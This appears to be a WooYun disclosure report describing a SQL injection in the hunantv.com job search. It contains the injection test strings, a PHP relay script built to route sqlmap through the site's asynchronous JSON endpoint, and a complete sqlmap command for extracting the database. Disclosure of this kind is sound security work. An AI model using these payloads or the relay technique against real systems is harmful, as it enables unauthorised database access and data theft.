WooYun.org

网址http://corp.hunantv.com/jobs/在搜索框中输入q%' and 1=1 and '%'=' 和 q%' and 1=2 and '%'=' 可以初步判断出这是一枚搜索型注入。基本的注入工具如穿山甲和sqlmap等，都无法直接注入。手工注入不实际，但是经过对页面js代码和数据包的分析。了解到页面利用了异步数据传输从http://act.hunantv.com/cmsapi/job.php处请求json数据。由于是异步传输数据，sqlmap等工具无法识别页面的不同，导致无法注入。
于是利用php中转脚本，直接从http://act.hunantv.com/cmsapi/job.php处请求json数据。代码如下

<html>
<head>
</head>
<body>
<?php
$key=$_GET['k'];
$newurl = urlencode(urlencode($key)); //url编码2次
$URL="http://act.hunantv.com/cmsapi/job.php?type=0&key=";
$json=file_get_contents($URL.$newurl); //json数据
echo '<p>'.$json.'</p>';  //这样sqlmap就能识别了
?>
</body>
</html>

这时就可以用sqlmap注入了：./sqlmap.py -u"http://192.168.66.150/hunan.php?k=q" -p"k" --prefix="%'" --suffix=" and '%'='" --current-db